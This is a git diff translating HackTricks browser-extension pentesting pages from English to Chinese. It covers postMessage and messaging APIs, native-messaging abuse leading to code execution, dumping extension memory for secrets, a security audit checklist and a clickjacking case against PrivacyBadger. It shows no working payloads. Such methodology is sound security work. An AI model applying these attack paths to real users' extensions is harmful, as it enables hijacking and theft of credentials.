-    if (event.data.type && event.data.type === "FROM_PAGE") {
-      console.log("Content script received: " + event.data.text)
-      // Forward the message to the background script
-      port.postMessage(event.data.text)
-    }
-  },
-  false
+if (event.data.type && event.data.type === "FROM_PAGE") {
+console.log("Content script received: " + event.data.text)
+// Forward the message to the background script
+port.postMessage(event.data.text)
+}
+},
+false
 )
 ```
 
 ```javascript:example.js
 document.getElementById("theButton").addEventListener(
-  "click",
-  () => {
-    window.postMessage(
-      { type: "FROM_PAGE", text: "Hello from the webpage!" },
-      "*"
-    )
-  },
-  false
+"click",
+() => {
+window.postMessage(
+{ type: "FROM_PAGE", text: "Hello from the webpage!" },
+"*"
+)
+},
+false
 )
 ```
+安全的 Post Message 通信应检查接收到的消息的真实性，这可以通过以下方式进行检查：
 
-A secure Post Message communication should check the authenticity of the received message, this can be done checking:
+- **`event.isTrusted`**：仅当事件是由用户操作触发时，此值为 True
+- 内容脚本可能仅在用户执行某些操作时才会期待消息
+- **origin domain**：可能仅允许白名单中的域名发送消息。
+- 如果使用正则表达式，请非常小心
+- **Source**：`received_message.source !== window` 可用于检查消息是否来自 **同一窗口**，即内容脚本正在监听的窗口。
 
-- **`event.isTrusted`**: This is True only if the event was triggered by a users action
-  - The content script might expecting a message only if the user performs some action
-- **origin domain**: might expecting a message only allowlist of domains.
-  - If a regex is used, be very careful
-- **Source**: `received_message.source !== window` can be used to check if the message was **from the same window** where the Content Script is listening.
-
-The previous checks, even if performed, could be vulnerable, so check in the following page **potential Post Message bypasses**:
+即使执行了上述检查，仍可能存在漏洞，因此请检查以下页面 **潜在的 Post Message 绕过**：
 
 {{#ref}}
 ../postmessage-vulnerabilities/
@@ -502,7 +466,7 @@ The previous checks, even if performed, could be vulnerable, so check in the fol
 
 ### Iframe
 
-Another possible way of communication might be through **Iframe URLs**, you can find an example in:
+另一种可能的通信方式可能是通过 **Iframe URLs**，您可以在以下位置找到示例：
 
 {{#ref}}
 browext-xss-example.md
@@ -510,240 +474,226 @@ browext-xss-example.md
 
 ### DOM
 
-This isn't "exactly" a communication way, but the **web and the content script will have access to the web DOM**. So, if the **content script** is reading some information from it, **trusting the web DOM**, the web could **modify this dat**a (because the web shouldn't be trusted, or because the web is vulnerable to XSS) and **compromise the Content Script**.
+这并不是“确切的”通信方式，但 **网页和内容脚本将可以访问网页 DOM**。因此，如果 **内容脚本** 从中读取某些信息，**信任网页 DOM**，网页可能会 **修改这些数据**（因为网页不应被信任，或者因为网页易受 XSS 攻击）并 **危害内容脚本**。
 
-You can also find an example of a **DOM based XSS to compromise a browser extension** in:
+您还可以在以下位置找到 **基于 DOM 的 XSS 以危害浏览器扩展** 的示例：
 
 {{#ref}}
 browext-xss-example.md
 {{#endref}}
 
-## Content Script **↔︎** Background Script Communication
+## 内容脚本 **↔︎** 背景脚本通信
 
-A Content Script can use the functions [**runtime.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) **or** [**tabs.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/tabs#method-sendMessage) to send a **one-time JSON-serializable** message.
+内容脚本可以使用 [**runtime.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) **或** [**tabs.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/tabs#method-sendMessage) 发送 **一次性 JSON 可序列化** 消息。
 
-To handle the **response**, use the returned **Promise**. Although, for backward compatibility, you can still pass a **callback** as the last argument.
-
-Sending a request from a **content script** looks like this:
+要处理 **响应**，请使用返回的 **Promise**。尽管为了向后兼容，您仍然可以将 **回调** 作为最后一个参数传递。
 
+从 **内容脚本** 发送请求的方式如下：
 ```javascript
 ;(async () => {
-  const response = await chrome.runtime.sendMessage({ greeting: "hello" })
-  // do something with response here, not outside the function
-  console.log(response)
+const response = await chrome.runtime.sendMessage({ greeting: "hello" })
+// do something with response here, not outside the function
+console.log(response)
 })()
 ```
-
-Sending a request from the **extension** (usually a **background script**). Example of how to send message to the content script in the selected tab:
-
+从**扩展**（通常是**后台脚本**）发送请求。向选定标签页中的内容脚本发送消息的示例：
 ```javascript
 // From https://stackoverflow.com/questions/36153999/how-to-send-a-message-between-chrome-extension-popup-and-content-script
 ;(async () => {
-  const [tab] = await chrome.tabs.query({
-    active: true,
-    lastFocusedWindow: true,
-  })
-  const response = await chrome.tabs.sendMessage(tab.id, { greeting: "hello" })
-  // do something with response here, not outside the function
-  console.log(response)
+const [tab] = await chrome.tabs.query({
+active: true,
+lastFocusedWindow: true,
+})
+const response = await chrome.tabs.sendMessage(tab.id, { greeting: "hello" })
+// do something with response here, not outside the function
+console.log(response)
 })()
 ```
-
-On the **receiving end**, you need to set up an [**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **event listener** to handle the message. This looks the same from a content script or extension page.
-
+在**接收端**，您需要设置一个[**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **事件监听器**来处理消息。这在内容脚本或扩展页面中看起来是一样的。
 ```javascript
 // From https://stackoverflow.com/questions/70406787/javascript-send-message-from-content-js-to-background-js
 chrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {
-  console.log(
-    sender.tab
-      ? "from a content script:" + sender.tab.url
-      : "from the extension"
-  )
-  if (request.greeting === "hello") sendResponse({ farewell: "goodbye" })
+console.log(
+sender.tab
+? "from a content script:" + sender.tab.url
+: "from the extension"
+)
+if (request.greeting === "hello") sendResponse({ farewell: "goodbye" })
 })
 ```
+在突出显示的示例中，**`sendResponse()`** 是以同步方式执行的。要修改 `onMessage` 事件处理程序以实现 `sendResponse()` 的异步执行，必须加入 `return true;`。
 
-In the example highlighted, **`sendResponse()`** was executed in a synchronous fashion. To modify the `onMessage` event handler for asynchronous execution of `sendResponse()`, it's imperative to incorporate `return true;`.
+一个重要的考虑是，在多个页面设置为接收 `onMessage` 事件的情况下，**第一个执行 `sendResponse()` 的页面** 将是唯一能够有效传递响应的页面。对同一事件的任何后续响应将不被考虑。
 
-An important consideration is that in scenarios where multiple pages are set to receive `onMessage` events, **the first page to execute `sendResponse()`** for a specific event will be the only one able to deliver the response effectively. Any subsequent responses to the same event will not be taken into account.
-
-When crafting new extensions, the preference should be towards promises as opposed to callbacks. Concerning the use of callbacks, the `sendResponse()` function is considered valid only if it's executed directly within the synchronous context, or if the event handler indicates an asynchronous operation by returning `true`. Should none of the handlers return `true` or if the `sendResponse()` function is removed from memory (garbage-collected), the callback associated with the `sendMessage()` function will be triggered by default.
+在创建新扩展时，应该优先使用 promises 而不是回调。关于回调的使用，只有在同步上下文中直接执行 `sendResponse()` 函数，或者事件处理程序通过返回 `true` 表示异步操作时，`sendResponse()` 函数才被视为有效。如果没有任何处理程序返回 `true`，或者 `sendResponse()` 函数从内存中移除（被垃圾回收），则与 `sendMessage()` 函数关联的回调将默认被触发。
 
 ## Native Messaging
 
-Browser extensions also allow to communicate with **binaries in the system via stdin**. The application must install a json indicating so in a json like:
-
+浏览器扩展还允许通过 **stdin 与系统中的二进制文件进行通信**。应用程序必须安装一个 json 来指示这一点，格式如下：
 ```json
 {
-  "name": "com.my_company.my_application",
-  "description": "My Application",
-  "path": "C:\\Program Files\\My Application\\chrome_native_messaging_host.exe",
-  "type": "stdio",
-  "allowed_origins": ["chrome-extension://knldjmfmopnpolahpmmgbagdohdnhkik/"]
+"name": "com.my_company.my_application",
+"description": "My Application",
+"path": "C:\\Program Files\\My Application\\chrome_native_messaging_host.exe",
+"type": "stdio",
+"allowed_origins": ["chrome-extension://knldjmfmopnpolahpmmgbagdohdnhkik/"]
 }
 ```
+`name` 是传递给 [`runtime.connectNative()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-connectNative) 或 [`runtime.sendNativeMessage()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-sendNativeMessage) 的字符串，用于从浏览器扩展的后台脚本与应用程序进行通信。`path` 是二进制文件的路径，只有 1 种有效的 `type`，即 stdio（使用 stdin 和 stdout），`allowed_origins` 表示可以访问它的扩展（不能使用通配符）。
 
-Where the `name` is the string passed to [`runtime.connectNative()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-connectNative) or [`runtime.sendNativeMessage()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-sendNativeMessage) to communicate with the application from the background scripts of the browser extension. The `path` is the path to the binary, there is only 1 valid `type` which is stdio (use stdin and stdout) and the `allowed_origins` indicate the extensions that can access it (and can't have wildcard).
-
-Chrome/Chromium will search for this json in some windows registry and some paths in macOS and Linux (more info in the [**docs**](https://developer.chrome.com/docs/extensions/develop/concepts/native-messaging)).
+Chrome/Chromium 会在某些 Windows 注册表和 macOS 和 Linux 的某些路径中搜索此 json（更多信息请参见 [**docs**](https://developer.chrome.com/docs/extensions/develop/concepts/native-messaging)）。
 
 > [!TIP]
-> The browser extension also needs the `nativeMessaing` permission declared in order to be able to use this communication.
-
-This is how it looks like some background script code sending messages to a native application:
+> 浏览器扩展还需要声明 `nativeMessaing` 权限，以便能够使用此通信。
 
+这就是一些后台脚本代码向本地应用程序发送消息的样子：
 ```javascript
 chrome.runtime.sendNativeMessage(
-  "com.my_company.my_application",
-  { text: "Hello" },
-  function (response) {
-    console.log("Received " + response)
-  }
+"com.my_company.my_application",
+{ text: "Hello" },
+function (response) {
+console.log("Received " + response)
+}
 )
 ```
+在[**这篇博客文章**](https://spaceraccoon.dev/universal-code-execution-browser-extensions/)中，提出了一种利用本机消息的脆弱模式：
 
-In [**this blog post**](https://spaceraccoon.dev/universal-code-execution-browser-extensions/), a vulnerable pattern abusing native messages is proposed:
+1. 浏览器扩展对内容脚本有一个通配符模式。
+2. 内容脚本使用`sendMessage`将`postMessage`消息传递给后台脚本。
+3. 后台脚本使用`sendNativeMessage`将消息传递给本机应用程序。
+4. 本机应用程序危险地处理消息，导致代码执行。
 
-1. Browser extension has a wildcard pattern for content script.
-2. Content script passes `postMessage` messages to the background script using `sendMessage`.
-3. Background script passes the message to native application using `sendNativeMessage`.
-4. Native application handles the message dangerously, leading to code execution.
+其中解释了**如何从任何页面利用浏览器扩展进行RCE**的示例。
 
-And inside of it an example of **going from any page to RCE abusing a browser extension is explained**.
+## 内存/代码/剪贴板中的敏感信息
 
-## Sensitive Information in Memory/Code/Clipboard
+如果浏览器扩展将**敏感信息存储在其内存中**，则可能会被**转储**（特别是在Windows机器上）并**搜索**这些信息。
 
-If a Browser Extension stores **sensitive information inside it's memory**, this could be **dumped** (specially in Windows machines) and **searched** for this information.
+因此，浏览器扩展的内存**不应被视为安全**，而且**敏感信息**如凭据或助记短语**不应存储**。
 
-Therefore, the memory of the Browser Extension **shouldn't be considered secure** and **sensitive information** such as credentials or mnemonic phrases **shouldn't be stored**.
+当然，**不要在代码中放置敏感信息**，因为它将是**公开的**。
 
-Of course, do **not put sensitive information in the code**, as it will be **public**.
+要从浏览器转储内存，可以**转储进程内存**，或者进入浏览器扩展的**设置**，点击**`Inspect pop-up`** -> 在**`Memory`**部分 -> **`Take a snapshot`**，然后使用**`CTRL+F`**在快照中搜索敏感信息。
 
-To dump memory from the browser you could **dump the process memory** or to go to the **settings** of the browser extension click on **`Inspect pop-up`** -> In the **`Memory`** section -> **`Take a snaphost`** and **`CTRL+F`** to search inside the snapshot for sensitive info.
+此外，像助记密钥或密码这样的高度敏感信息**不应允许复制到剪贴板**（或者至少在几秒钟内将其从剪贴板中移除），因为这样监控剪贴板的进程将能够获取它们。
 
-Moreover, highly sensitive information like mnemonic keys or passwords **shouldn't be allowed to be copied in the clipboard** (or at least remove it from the clipboard in a few seconds) because then processes monitoring the clipboard will be able to get them.
+## 在浏览器中加载扩展
 
-## Loading an Extension in the Browser
+1. **下载**浏览器扩展并解压
+2. 转到**`chrome://extensions/`**并**启用**`开发者模式`
+3. 点击**`加载已解压的扩展`**按钮
 
-1. **Download** the Browser Extension & unzipped
-2. Go to **`chrome://extensions/`** and **enable** the `Developer Mode`
-3. Click the **`Load unpacked`** button
+在**Firefox**中，转到**`about:debugging#/runtime/this-firefox`**并点击**`加载临时附加组件`**按钮。
 
-In **Firefox** you go to **`about:debugging#/runtime/this-firefox`** and click **`Load Temporary Add-on`** button.
+## 从商店获取源代码
 
-## Getting the source code from the store
+Chrome扩展的源代码可以通过多种方法获得。以下是每个选项的详细说明和指令。
 
-The source code of a Chrome extension can be obtained through various methods. Below are detailed explanations and instructions for each option.
+### 通过命令行下载扩展为ZIP
 
-### Download Extension as ZIP via Command Line
-
-The source code of a Chrome extension can be downloaded as a ZIP file using the command line. This involves using `curl` to fetch the ZIP file from a specific URL and then extracting the contents of the ZIP file to a directory. Here are the steps:
-
-1. Replace `"extension_id"` with the actual ID of the extension.
-2. Execute the following commands:
+Chrome扩展的源代码可以通过命令行下载为ZIP文件。这涉及使用`curl`从特定URL获取ZIP文件，然后将ZIP文件的内容提取到一个目录中。以下是步骤：
 
+1. 将`"extension_id"`替换为扩展的实际ID。
+2. 执行以下命令：
 ```bash
 extension_id=your_extension_id   # Replace with the actual extension ID
 curl -L -o "$extension_id.zip" "https://clients2.google.com/service/update2/crx?response=redirect&os=mac&arch=x86-64&nacl_arch=x86-64&prod=chromecrx&prodchannel=stable&prodversion=44.0.2403.130&x=id%3D$extension_id%26uc"
 unzip -d "$extension_id-source" "$extension_id.zip"
 ```
-
-### Use the CRX Viewer website
+### 使用 CRX Viewer 网站
 
 [https://robwu.nl/crxviewer/](https://robwu.nl/crxviewer/)
 
-### Use the CRX Viewer extension
+### 使用 CRX Viewer 扩展
 
-Another convenient method is using the Chrome Extension Source Viewer, which is an open-source project. It can be installed from the [Chrome Web Store](https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en). The source code of the viewer is available in its [GitHub repository](https://github.com/Rob--W/crxviewer).
+另一种方便的方法是使用 Chrome 扩展源查看器，这是一个开源项目。可以从 [Chrome Web Store](https://chrome.google.com/webstore/detail/chrome-extension-source-v/jifpbeccnghkjeaalbbjmodiffmgedin?hl=en) 安装。查看器的源代码可在其 [GitHub repository](https://github.com/Rob--W/crxviewer) 中找到。
 
-### View source of locally installed extension
+### 查看本地安装扩展的源代码
 
-Chrome extensions installed locally can also be inspected. Here's how:
+本地安装的 Chrome 扩展也可以被检查。方法如下：
 
-1. Access your Chrome local profile directory by visiting `chrome://version/` and locating the "Profile Path" field.
-2. Navigate to the `Extensions/` subfolder within the profile directory.
-3. This folder contains all installed extensions, typically with their source code in a readable format.
+1. 通过访问 `chrome://version/` 并找到“Profile Path”字段来访问您的 Chrome 本地配置文件目录。
+2. 在配置文件目录中导航到 `Extensions/` 子文件夹。
+3. 此文件夹包含所有已安装的扩展，通常其源代码以可读格式存放。
 
-To identify extensions, you can map their IDs to names:
+要识别扩展，您可以将其 ID 映射到名称：
 
-- Enable Developer Mode on the `about:extensions` page to see the IDs of each extension.
-- Within each extension's folder, the `manifest.json` file contains a readable `name` field, helping you to identify the extension.
+- 在 `about:extensions` 页面上启用开发者模式，以查看每个扩展的 ID。
+- 在每个扩展的文件夹中，`manifest.json` 文件包含一个可读的 `name` 字段，帮助您识别扩展。
 
-### Use a File Archiver or Unpacker
+### 使用文件归档程序或解压缩工具
 
-Go to the Chrome Web Store and download the extension. The file will have a `.crx` extension. Change the file extension from `.crx` to `.zip`. Use any file archiver (like WinRAR, 7-Zip, etc.) to extract the contents of the ZIP file.
+前往 Chrome Web Store 下载扩展。文件将具有 `.crx` 扩展名。将文件扩展名从 `.crx` 更改为 `.zip`。使用任何文件归档程序（如 WinRAR、7-Zip 等）提取 ZIP 文件的内容。
 
-### Use Developer Mode in Chrome
+### 在 Chrome 中使用开发者模式
 
-Open Chrome and go to `chrome://extensions/`. Enable "Developer mode" at the top right. Click on "Load unpacked extension...". Navigate to the directory of your extension. This doesn't download the source code, but it's useful for viewing and modifying the code of an already downloaded or developed extension.
+打开 Chrome 并转到 `chrome://extensions/`。在右上角启用“开发者模式”。点击“加载已解压的扩展...”。导航到您的扩展目录。这不会下载源代码，但对于查看和修改已下载或开发的扩展的代码非常有用。
 
-## Chrome extension manifest dataset
-
-In order to try to spot vulnerable browser extensions you could use the[https://github.com/palant/chrome-extension-manifests-dataset](https://github.com/palant/chrome-extension-manifests-dataset) and check their manifest files for potentially vulnerable signs. For example to check for extensions with more than 25000 users, `content_scripts` and the permission `nativeMessaing`:
+## Chrome 扩展清单数据集
 
+为了尝试发现易受攻击的浏览器扩展，您可以使用 [https://github.com/palant/chrome-extension-manifests-dataset](https://github.com/palant/chrome-extension-manifests-dataset) 并检查其清单文件以寻找潜在的易受攻击迹象。例如，检查用户超过 25000 的扩展，`content_scripts` 和权限 `nativeMessaing`：
 ```bash
 # Query example from https://spaceraccoon.dev/universal-code-execution-browser-extensions/
 node query.js -f "metadata.user_count > 250000" "manifest.content_scripts?.length > 0 && manifest.permissions?.includes('nativeMessaging')"
 ```
+## 安全审计检查清单
 
-## Security Audit Checklist
+尽管浏览器扩展具有**有限的攻击面**，但其中一些可能包含**漏洞**或**潜在的加固改进**。以下是最常见的：
 
-Even though Browser Extensions have a **limited attack surface**, some of them might contain **vulnerabilities** or **potential hardening improvements**. The following ones are the most common ones:
+- [ ] 尽可能**限制**请求的**`permissions`**
+- [ ] 尽可能**限制****`host_permissions`**
+- [ ] 使用**强**的**`content_security_policy`**
+- [ ] 尽可能**限制****`externally_connectable`**，如果不需要且可能，请不要默认留空，指定**`{}`**
+- [ ] 如果这里提到的**URL易受XSS或接管攻击**，攻击者将能够**直接向后台脚本发送消息**。这是一个非常强大的绕过方式。
+- [ ] 尽可能**限制****`web_accessible_resources`**，如果可能，甚至留空。
+- [ ] 如果**`web_accessible_resources`**不为空，请检查[**ClickJacking**](browext-clickjacking.md)
+- [ ] 如果**扩展**与**网页**之间发生任何**通信**，[**检查XSS**](browext-xss-example.md) **漏洞**。
+- [ ] 如果使用了Post Messages，请检查[**Post Message漏洞**](../postmessage-vulnerabilities/)**.**
+- [ ] 如果**内容脚本访问DOM细节**，请检查它们是否在被网页**修改**时**引入XSS**。
+- [ ] 如果此通信也涉及**内容脚本 -> 后台脚本通信**，请特别强调。
+- [ ] 如果后台脚本通过**本机消息传递**进行通信，请检查通信是否安全且经过清理。
+- [ ] **敏感信息不应存储**在浏览器扩展**代码**中。
+- [ ] **敏感信息不应存储**在浏览器扩展**内存**中。
+- [ ] **敏感信息不应存储**在**文件系统中未受保护**。
 
-- [ ] **Limit** as much as possible requested **`permissions`**
-- [ ] **Limit** as much as possible **`host_permissions`**
-- [ ] Use a **strong** **`content_security_policy`**
-- [ ] **Limit** as much as possible the **`externally_connectable`**, if none is needed and possible, do not leave it by default, specify **`{}`**
-  - [ ] If **URL vulnerable to XSS or to takeover** is mentioned here, an attacker will be able to **send messages to the background scripts directly**. Very powerful bypass.
-- [ ] **Limit** as much as possible the **`web_accessible_resources`**, even empty if possible.
-- [ ] If **`web_accessible_resources`** is not none, check for [**ClickJacking**](browext-clickjacking.md)
-- [ ] If any **communication** occurs from the **extension** to the **web page**, [**check for XSS**](browext-xss-example.md) **vulnerabilities** caused in the communication.
-  - [ ] If Post Messages are used, check for [**Post Message vulnerabilities**](../postmessage-vulnerabilities/)**.**
-  - [ ] If the **Content Script access DOM details**, check that they **aren't introducing a XSS** if they get **modified** by the web
-  - [ ] Make a special emphasis if this communication is also involved in the **Content Script -> Background script communication**
-  - [ ] If the background script is communicating via **native messaging** check the communication is secure and sanitized
-- [ ] **Sensitive information shouldn't be stored** inside the Browser Extension **code**
-- [ ] **Sensitive information shouldn't be stored** inside the Browser Extension **memory**
-- [ ] **Sensitive information shouldn't be stored** inside the **file system unprotected**
+## 浏览器扩展风险
 
-## Browser Extension Risks
+- 应用程序[https://crxaminer.tech/](https://crxaminer.tech/)分析一些数据，例如浏览器扩展请求的权限，以提供使用浏览器扩展的风险级别。
 
-- The app [https://crxaminer.tech/](https://crxaminer.tech/) analyzes some data like the permissions browser extension requests to give a risk level of using the browser extension.
-
-## Tools
+## 工具
 
 ### [**Tarnish**](https://thehackerblog.com/tarnish/)
 
-- Pulls any Chrome extension from a provided Chrome webstore link.
-- [**manifest.json**](https://developer.chrome.com/extensions/manifest) **viewer**: simply displays a JSON-prettified version of the extension’s manifest.
-- **Fingerprint Analysis**: Detection of [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) and automatic generation of Chrome extension fingerprinting JavaScript.
-- **Potential Clickjacking Analysis**: Detection of extension HTML pages with the [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) directive set. These are potentially vulnerable to clickjacking depending on the purpose of the pages.
-- **Permission Warning(s) viewer**: which shows a list of all the Chrome permission prompt warnings which will be displayed upon a user attempting to install the extension.
-- **Dangerous Function(s)**: shows the location of dangerous functions which could potentially be exploited by an attacker (e.g. functions such as innerHTML, chrome.tabs.executeScript).
-- **Entry Point(s)**: shows where the extension takes in user/external input. This is useful for understanding an extension’s surface area and looking for potential points to send maliciously-crafted data to the extension.
-- Both the Dangerous Function(s) and Entry Point(s) scanners have the following for their generated alerts:
-  - Relevant code snippet and line that caused the alert.
-  - Description of the issue.
-  - A “View File” button to view the full source file containing the code.
-  - The path of the alerted file.
-  - The full Chrome extension URI of the alerted file.
-  - The type of file it is, such as a Background Page script, Content Script, Browser Action, etc.
-  - If the vulnerable line is in a JavaScript file, the paths of all of the pages where it is included as well as these page’s type, and [web_accessible_resource](https://developer.chrome.com/extensions/manifest/web_accessible_resources) status.
-- **Content Security Policy (CSP) analyzer and bypass checker**: This will point out weaknesses in your extension’s CSP and will also illuminate any potential ways to bypass your CSP due to whitelisted CDNs, etc.
-- **Known Vulnerable Libraries**: This uses [Retire.js](https://retirejs.github.io/retire.js/) to check for any usage of known-vulnerable JavaScript libraries.
-- Download extension and formatted versions.
-  - Download the original extension.
-  - Download a beautified version of the extension (auto prettified HTML and JavaScript).
-- Automatic caching of scan results, running an extension scan will take a good amount of time the first time you run it. However the second time, assuming the extension hasn’t been updated, will be almost instant due to the results being cached.
-- Linkable Report URLs, easily link someone else to an extension report generated by tarnish.
+- 从提供的Chrome网上应用店链接提取任何Chrome扩展。
+- [**manifest.json**](https://developer.chrome.com/extensions/manifest) **查看器**：简单地显示扩展清单的JSON美化版本。
+- **指纹分析**：检测[web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources)并自动生成Chrome扩展指纹JavaScript。
+- **潜在Clickjacking分析**：检测设置了[web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources)指令的扩展HTML页面。这些页面可能易受Clickjacking攻击，具体取决于页面的目的。
+- **权限警告查看器**：显示用户尝试安装扩展时将显示的所有Chrome权限提示警告的列表。
+- **危险函数**：显示可能被攻击者利用的危险函数的位置（例如，innerHTML、chrome.tabs.executeScript等函数）。
+- **入口点**：显示扩展接收用户/外部输入的位置。这对于理解扩展的表面区域和寻找潜在的恶意数据发送点非常有用。
+- 危险函数和入口点扫描器生成的警报具有以下内容：
+  - 相关代码片段和导致警报的行。
+  - 问题描述。
+  - “查看文件”按钮以查看包含代码的完整源文件。
+  - 警报文件的路径。
+  - 警报文件的完整Chrome扩展URI。
+  - 文件类型，例如后台页面脚本、内容脚本、浏览器操作等。
+  - 如果易受攻击的行在JavaScript文件中，所有包含该行的页面的路径以及这些页面的类型和[web_accessible_resource](https://developer.chrome.com/extensions/manifest/web_accessible_resources)状态。
+- **内容安全策略（CSP）分析器和绕过检查器**：这将指出扩展CSP中的弱点，并揭示由于白名单CDN等原因绕过CSP的潜在方法。
+- **已知漏洞库**：使用[Retire.js](https://retirejs.github.io/retire.js/)检查是否使用了已知漏洞的JavaScript库。
+- 下载扩展和格式化版本。
+- 下载原始扩展。
+- 下载美化版本的扩展（自动美化的HTML和JavaScript）。
+- 扫描结果的自动缓存，第一次运行扩展扫描将花费相当长的时间。然而，第二次运行时，假设扩展没有更新，将几乎是瞬时的，因为结果被缓存。
+- 可链接的报告URL，轻松将其他人链接到tarnish生成的扩展报告。
 
 ### [Neto](https://github.com/elevenpaths/neto)
 
-Project Neto is a Python 3 package conceived to analyse and unravel hidden features of browser plugins and extensions for well-known browsers such as Firefox and Chrome. It automates the process of unzipping the packaged files to extract these features from relevant resources in a extension like `manifest.json`, localization folders or Javascript and HTML source files.
+Neto项目是一个Python 3包，旨在分析和揭示知名浏览器（如Firefox和Chrome）浏览器插件和扩展的隐藏功能。它自动解压打包文件，以从扩展的相关资源中提取这些功能，如`manifest.json`、本地化文件夹或JavaScript和HTML源文件。
 
-## References
+## 参考文献
 
-- **Thanks to** [**@naivenom**](https://twitter.com/naivenom) **for the help with this methodology**
+- **感谢** [**@naivenom**](https://twitter.com/naivenom) **对本方法的帮助**
 - [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
 - [https://palant.info/2022/08/10/anatomy-of-a-basic-extension/](https://palant.info/2022/08/10/anatomy-of-a-basic-extension/)
 - [https://palant.info/2022/08/24/attack-surface-of-extension-pages/](https://palant.info/2022/08/24/attack-surface-of-extension-pages/)
@@ -755,4 +705,3 @@ Project Neto is a Python 3 package conceived to analyse and unravel hidden featu
 - [https://gist.github.com/LongJohnCoder/9ddf5735df3a4f2e9559665fb864eac0](https://gist.github.com/LongJohnCoder/9ddf5735df3a4f2e9559665fb864eac0)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
index 849cdb7a1..30374d149 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
@@ -2,101 +2,96 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-This page is going to abuse a ClickJacking vulnerability in a Browser extension.\
-If you don't know what ClickJacking is check:
+本页面将利用浏览器扩展中的ClickJacking漏洞。\
+如果你不知道ClickJacking是什么，请查看：
 
 {{#ref}}
 ../clickjacking.md
 {{#endref}}
 
-Extensions contains the file **`manifest.json`** and that JSON file has a field `web_accessible_resources`. Here's what [the Chrome docs](https://developer.chrome.com/extensions/manifest/web_accessible_resources) say about it:
+扩展包含文件**`manifest.json`**，该JSON文件有一个字段`web_accessible_resources`。以下是[Chrome文档](https://developer.chrome.com/extensions/manifest/web_accessible_resources)中对此的说明：
 
-> These resources would then be available in a webpage via the URL **`chrome-extension://[PACKAGE ID]/[PATH]`**, which can be generated with the **`extension.getURL method`**. Allowlisted resources are served with appropriate CORS headers, so they're available via mechanisms like XHR.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
+> 这些资源将通过URL **`chrome-extension://[PACKAGE ID]/[PATH]`** 在网页中可用，该URL可以通过**`extension.getURL method`**生成。允许的资源会带有适当的CORS头，因此可以通过XHR等机制访问。[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
 
-The **`web_accessible_resources`** in a browser extension are not just accessible via the web; they also operate with the extension's inherent privileges. This means they have the capability to:
+浏览器扩展中的**`web_accessible_resources`**不仅可以通过网络访问；它们还具有扩展的固有权限。这意味着它们能够：
 
-- Change the extension's state
-- Load additional resources
-- Interact with the browser to a certain extent
+- 更改扩展的状态
+- 加载额外的资源
+- 在一定程度上与浏览器交互
 
-However, this feature presents a security risk. If a resource within **`web_accessible_resources`** has any significant functionality, an attacker could potentially embed this resource into an external web page. Unsuspecting users visiting this page might inadvertently activate this embedded resource. Such activation could lead to unintended consequences, depending on the permissions and capabilities of the extension's resources.
+然而，这一特性带来了安全风险。如果**`web_accessible_resources`**中的某个资源具有任何重要功能，攻击者可能会将该资源嵌入到外部网页中。毫无防备的用户访问此页面时，可能会无意中激活此嵌入的资源。这种激活可能导致意想不到的后果，具体取决于扩展资源的权限和能力。
 
-## PrivacyBadger Example
-
-In the extension PrivacyBadger, a vulnerability was identified related to the `skin/` directory being declared as `web_accessible_resources` in the following manner (Check the original [blog post](https://blog.lizzie.io/clickjacking-privacy-badger.html)):
+## PrivacyBadger 示例
 
+在扩展PrivacyBadger中，发现了一个与`skin/`目录被声明为`web_accessible_resources`相关的漏洞，具体如下（查看原始[博客文章](https://blog.lizzie.io/clickjacking-privacy-badger.html)）：
 ```json
 "web_accessible_resources": [
-  "skin/*",
-  "icons/*"
+"skin/*",
+"icons/*"
 ]
 ```
+此配置导致了潜在的安全问题。具体来说，`skin/popup.html` 文件在与浏览器中的 PrivacyBadger 图标交互时被渲染，可以嵌入在 `iframe` 中。这种嵌入可能被利用来欺骗用户无意中点击“为此网站禁用 PrivacyBadger”。这样的行为将通过禁用 PrivacyBadger 保护来危害用户的隐私，并可能使用户面临更高的跟踪风险。此漏洞的视觉演示可以在提供的 ClickJacking 视频示例中查看，链接为 [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)。
 
-This configuration led to a potential security issue. Specifically, the `skin/popup.html` file, which is rendered upon interaction with the PrivacyBadger icon in the browser, could be embedded within an `iframe`. This embedding could be exploited to deceive users into inadvertently clicking on "Disable PrivacyBadger for this Website". Such an action would compromise the user's privacy by disabling the PrivacyBadger protection and potentially subjecting the user to increased tracking. A visual demonstration of this exploit can be viewed in a ClickJacking video example provided at [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm).
